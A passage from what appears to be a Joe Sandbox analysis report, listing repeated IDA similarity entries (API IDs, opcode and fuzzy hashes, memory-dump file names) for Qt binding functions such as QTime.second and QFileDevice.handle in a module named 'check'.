                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?propertyFromLongLong_MetaObject@@Offset@
                                                                                                                                                                                                                • String ID: QMetaObject$propertyOffset$propertyOffset(self) -> int
                                                                                                                                                                                                                • API String ID: 4183937068-74422094
                                                                                                                                                                                                                • Opcode ID: 3c42a371519990b2fb012a160f702b532ce3138a88f4dea13f1d1e17e21a9f63
                                                                                                                                                                                                                • Instruction ID: a35ebdfa8cb52a4bf6fb2aee09db38e4b7c982e8d0dc7a5d6787b37488f8a7af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c42a371519990b2fb012a160f702b532ce3138a88f4dea13f1d1e17e21a9f63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85012CB5A05A4681DB40DF75E85CBA933A4FB44B95F954032CA4D53320DF7DD559C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?handle@Device@@FileFromLongLong_
                                                                                                                                                                                                                • String ID: QFileDevice$handle$handle(self) -> int
                                                                                                                                                                                                                • API String ID: 2586089561-260498642
                                                                                                                                                                                                                • Opcode ID: 35397f979c60e575543e16e8f6755132ba2f7416a286dfee1256143fa71bd1f3
                                                                                                                                                                                                                • Instruction ID: dd21435100cf21200f5cc8baa51c50dc22a9160877fb1affca401ed5e942352b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35397f979c60e575543e16e8f6755132ba2f7416a286dfee1256143fa71bd1f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C011AB5A09B4681DB40DF75E84CBA833A4FB44B81F994032CA5D53320EFBDD649C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Long$?bytesFree@FromInfo@@Long_Storage
                                                                                                                                                                                                                • String ID: QStorageInfo$bytesFree$bytesFree(self) -> int
                                                                                                                                                                                                                • API String ID: 326865264-460611067
                                                                                                                                                                                                                • Opcode ID: 86512de4bf92bd8a9cc08756901bc1fa709f557ca4b9add5431f9fb306e0d041
                                                                                                                                                                                                                • Instruction ID: bae7384fa5acc88b3fadad83717e817d2fd5e8ec4075d831f7013141a5006446
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86512de4bf92bd8a9cc08756901bc1fa709f557ca4b9add5431f9fb306e0d041
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A80128B5A09A8AC1DB00DF75E85CBA833A4FB44B84FA54032CA4D53320EF7DD649C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongMachine@@Running@State
                                                                                                                                                                                                                • String ID: QStateMachine$isRunning$isRunning(self) -> bool
                                                                                                                                                                                                                • API String ID: 547970032-2361301126
                                                                                                                                                                                                                • Opcode ID: 9ce15be13115e4b91770afdd9d6c426855d8e7d74ff806002a569a64eb0d9fc9
                                                                                                                                                                                                                • Instruction ID: 3ea083d69524391abc4c692ed6960c3f642ed40461619695c5d7cee7688dcd2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce15be13115e4b91770afdd9d6c426855d8e7d74ff806002a569a64eb0d9fc9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A0116B1A09A8691EB00DF75E88CBA933A4FB44B85F954032CA9D57320DF7DD589C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?available@FromLongLong_Semaphore@@
                                                                                                                                                                                                                • String ID: QSemaphore$available$available(self) -> int
                                                                                                                                                                                                                • API String ID: 146332400-2527996077
                                                                                                                                                                                                                • Opcode ID: 29a3f4c850002796254c181953313dd464db29dbe7fbd0efedf8015c16e5d8a0
                                                                                                                                                                                                                • Instruction ID: 8fd6ed7533921b1ae3347c7579e7861333ddeb79d88096b5fc6c0eb083b2f39c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29a3f4c850002796254c181953313dd464db29dbe7fbd0efedf8015c16e5d8a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C0116B6A09A46C1DB00DF75E84CBA833A4FB44B84F994032CA5D63320EFBDD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Long$?deadlineDeadlineFromLong_Secs@Timer@@
                                                                                                                                                                                                                • String ID: QDeadlineTimer$deadlineNSecs$deadlineNSecs(self) -> int
                                                                                                                                                                                                                • API String ID: 483997131-3515370272
                                                                                                                                                                                                                • Opcode ID: 77aa0b92e738fe707e243315768a2fe66408f0409195c0e6ae282c338e722bb4
                                                                                                                                                                                                                • Instruction ID: 174449aa794afe7628eedf00a528dad74cab285e63202f8ccc3d61c4e3184081
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77aa0b92e738fe707e243315768a2fe66408f0409195c0e6ae282c338e722bb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9012CB5A09B8681DB00DF71E84CBA933A4FB84B94F954032CA4D13320DF7DD589C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Empty@Exp@@FromLong
                                                                                                                                                                                                                • String ID: QRegExp$isEmpty$isEmpty(self) -> bool
                                                                                                                                                                                                                • API String ID: 4250777161-2857332203
                                                                                                                                                                                                                • Opcode ID: a3d6c70dec099f4d84ea98fdb8c00c657d32783bbeef7068eaaccdee75f68223
                                                                                                                                                                                                                • Instruction ID: 1ec9ba3fe4e98cac871c7a448394b0156685ae64d469df06fa59da9234a2d11a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3d6c70dec099f4d84ea98fdb8c00c657d32783bbeef7068eaaccdee75f68223
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A012CB1E05A4681DB40EF61E84CBA933B4FB44B45F954032CA9D53360DF7DD559C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?hasBool_DeadlineExpired@FromLongTimer@@
                                                                                                                                                                                                                • String ID: QDeadlineTimer$hasExpired$hasExpired(self) -> bool
                                                                                                                                                                                                                • API String ID: 2566822401-865512920
                                                                                                                                                                                                                • Opcode ID: 7a4e514d909d9bfd6bf4cfd723076d7f573426017d6b876aabe34d4417d0f8c1
                                                                                                                                                                                                                • Instruction ID: ae71c460d849cac0cf72b564dc3bdbbc6d2bb06920cfced2698d55c8a994c985
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4e514d909d9bfd6bf4cfd723076d7f573426017d6b876aabe34d4417d0f8c1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51012CB1A09A8681DB00DF71E88CBA933A4FB44B85F950032CA5D17360DFBDD549C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?second@FromLongLong_Time@@
                                                                                                                                                                                                                • String ID: QTime$second$second(self) -> int
                                                                                                                                                                                                                • API String ID: 2466771933-3390988170
                                                                                                                                                                                                                • Opcode ID: cee141784b44210ccadef63edacb5c6e9486f0a57cd9cc3b6bc8d7abe17a708f
                                                                                                                                                                                                                • Instruction ID: 49da3d99abe60247d2ca3f0b95870efdf92ad72046f47d935cd0418ae9b07546
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cee141784b44210ccadef63edacb5c6e9486f0a57cd9cc3b6bc8d7abe17a708f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C50116B5A09A4681DB00DF71E84CBA833A4FB84B84F994032CA5D53320EFBDD64AC384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?senderFromIndex@LongLong_Object@@Signal
